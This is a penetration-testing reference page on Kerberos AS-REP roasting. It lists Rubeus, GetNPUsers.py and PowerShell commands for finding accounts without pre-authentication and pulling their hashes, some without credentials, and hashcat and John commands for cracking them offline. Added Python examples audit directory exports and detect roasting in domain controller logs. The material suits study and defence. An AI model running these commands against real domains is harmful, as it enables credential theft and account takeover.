
Exploitation - Kerberos AS_REP roasting

Overview

An AS_REP roasting attack is an attack on the Kerberos authentication protocol that involves compromising the password of a user account that does not require Kerberos pre-authentication.

The attack is based on the fact that the KRB_AS_REP response, sent by the KDC (Key Distribution Center) in reply to an initial authentication request KRB_AS_REQ to the Authentication Service (AS), contains ciphertext encrypted using the client's secret key.

By default, the KRB_AS_REQ must include a timestamp encrypted with the client's secret key, so that the KDC can verify the user's identity before it returns a KRB_AS_REP response. This verification is omitted for user accounts that do not require Kerberos pre-authentication, i.e. accounts with the account property DONT_REQ_PREAUTH. The secrets of these user accounts are exposed to offline cracking attacks against the ciphertext, which are much faster than online guessing and cannot be time restricted.

Automated DONT_REQ_PREAUTH user accounts discovery and export of AS-REP responses

The following tools can be used to automate the discovery of user accounts that do not require Kerberos pre-authentication, and the request and export of their KRB_AS_REP responses for offline cracking.

In order to enumerate the domain user accounts, Rubeus / GetNPUsers.py must be started in a domain authenticated security context or provided with working domain credentials.

Rubeus.exe asreproast /outfile:<FILE>
Rubeus.exe asreproast /format:john /outfile:<FILE>

Rubeus.exe asreproast /creduser:'<DOMAIN_FQDN>\<USERNAME>' /credpassword:'<PASSWORD>' /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /outfile:<FILE_PATH>

# Will attempt to request a TGT for all users.
GetNPUsers.py -request <DOMAIN>/<USERNAME>[:<PASSWORD>]

DONT_REQ_PREAUTH user accounts discovery

The following tools can be used to discover user accounts that do not require Kerberos pre-authentication:

Get-ADUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-ADUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"

Get-NetUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-NetUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
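The same bitwise test (userAccountControl AND 4194304) can be run by a defender over a directory export to find and prioritise the exposed accounts. The following is an added example, not part of the original notes; the LDIF sample, account names and the use of adminCount as a privilege hint are constructed assumptions.

```python
# Added example: audit an LDIF export for accounts exposed to AS-REP roasting.
UF_ACCOUNTDISABLE = 0x00000002
UF_DONT_REQUIRE_PREAUTH = 0x00400000  # 4194304, the value used in the LDAP filter

# Constructed sample export (hypothetical accounts and domain).
SAMPLE_LDIF = """\
dn: CN=svc-backup,OU=Service,DC=corp,DC=example
sAMAccountName: svc-backup
userAccountControl: 4260352
adminCount: 1

dn: CN=alice,OU=Users,DC=corp,DC=example
sAMAccountName: alice
userAccountControl: 512

dn: CN=old-kiosk,OU=Users,DC=corp,DC=example
sAMAccountName: old-kiosk
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Split an LDIF export into one dict per entry (plain single-valued attributes only)."""
    entries = []
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            if line.startswith("#") or ":" not in line:
                continue
            key, _, value = line.partition(":")
            entry[key.strip()] = value.strip()
        if entry:
            entries.append(entry)
    return entries

def audit_preauth(entries):
    """Return accounts with DONT_REQ_PREAUTH set, enabled and privileged ones first."""
    findings = []
    for e in entries:
        uac = int(e.get("userAccountControl", "0"))
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        findings.append({
            "account": e.get("sAMAccountName", e.get("dn", "?")),
            "enabled": not uac & UF_ACCOUNTDISABLE,
            "privileged": e.get("adminCount") == "1",
        })
    findings.sort(key=lambda f: (not f["enabled"], not f["privileged"], f["account"]))
    return findings
```

Accounts reported as enabled should have the flag cleared (for instance with Set-ADAccountControl -DoesNotRequirePreAuth $false) unless a legacy client genuinely needs it, in which case a long random password limits the value of the exposed ciphertext.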

Request and export of KRB_AS_REP responses

The following tools can be used to request and export KRB_AS_REP for user accounts that do not require Kerberos pre-authentication.

The following operations do not require the knowledge of valid credentials.

Rubeus.exe asreproast /user:<USERNAME> /outfile:<FILE>
Rubeus.exe asreproast /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /user:<USERNAME> /outfile:<FILE>

GetNPUsers.py '<DOMAIN>/' -usersfile <USERNAMES_FILE>
GetNPUsers.py '<DOMAIN>/' -dc-ip <DC_HOSTNAME | DC_IP> -usersfile <USERNAMES_FILE> -format john
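On the domain controller, a TGT issued this way is recorded (when Kerberos Authentication Service auditing is enabled) as event 4768 with pre-authentication type 0. The following added example, which is not part of the original notes, shows detection logic over such events; the records are constructed and reduced to hypothetical dictionary keys standing for the event's account name, client address, PreAuthType, TicketEncryptionType and Status fields.

```python
from collections import defaultdict

# Constructed 4768 records (hypothetical accounts and addresses), time in seconds.
EVENTS = [
    {"time": 100, "user": "alice", "ip": "10.0.0.21", "preauth": "2", "etype": "0x12", "status": "0x0"},
    {"time": 130, "user": "svc-backup", "ip": "10.0.0.66", "preauth": "0", "etype": "0x17", "status": "0x0"},
    {"time": 131, "user": "old-app", "ip": "10.0.0.66", "preauth": "0", "etype": "0x17", "status": "0x0"},
    {"time": 132, "user": "svc-print", "ip": "10.0.0.66", "preauth": "0", "etype": "0x17", "status": "0x0"},
    {"time": 900, "user": "legacy-unix", "ip": "10.0.0.40", "preauth": "0", "etype": "0x12", "status": "0x0"},
]

def detect_asrep_roasting(events, window=60, min_accounts=3):
    """Return (hits, sweeps).

    hits:   successful TGT requests served without pre-authentication.
    sweeps: source IPs that obtained such tickets for at least `min_accounts`
            distinct accounts within `window` seconds, mapped to those accounts.
    """
    hits = [e for e in events if e["preauth"] == "0" and e["status"] == "0x0"]
    by_ip = defaultdict(list)
    for e in sorted(hits, key=lambda e: e["time"]):
        by_ip[e["ip"]].append(e)

    sweeps = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window so it never spans more than `window` seconds.
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            users = {e["user"] for e in evs[start:end + 1]}
            if len(users) >= min_accounts:
                sweeps[ip] = sorted(users | set(sweeps.get(ip, [])))
    return hits, sweeps

def rc4_accounts(hits):
    """Accounts whose pre-auth-less ticket used RC4 (0x17), the weakest case to crack."""
    return sorted({e["user"] for e in hits if e["etype"] == "0x17"})
```

A single hit from a known legacy host can be baselined; a sweep across several accounts from one address is the pattern worth alerting on.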

Offline cracking of KRB_AS_REP responses

Both John the Ripper (magnumripper fork) and hashcat can be used to crack the KRB_AS_REP responses.

The hash needs to respect the following format to be recognized by hashcat:

# ENCRYPTION_TYPE 23 = RC4
# ENCRYPTION_TYPE 17 = AES128
# ENCRYPTION_TYPE 18 = AES256

$krb5asrep$<ENCRYPTION_TYPE>$<USERNAME>@<DOMAIN>:85DA[...]

Depending on the tool used, the hash retrieved may need to be manually updated.

The following commands can be used to crack the KRB_AS_REP responses:

# It's recommended to use Hashcat on a Windows OS for better performance due to driver compatibility
hashcat64.exe -m 18200 -a 0 [-r <RULE_FILE>] '[<HASH> | <HASHFILE>]' <WORDLIST>

john --wordlist=<WORDLIST> <HASHFILE>


Last updated 3 years ago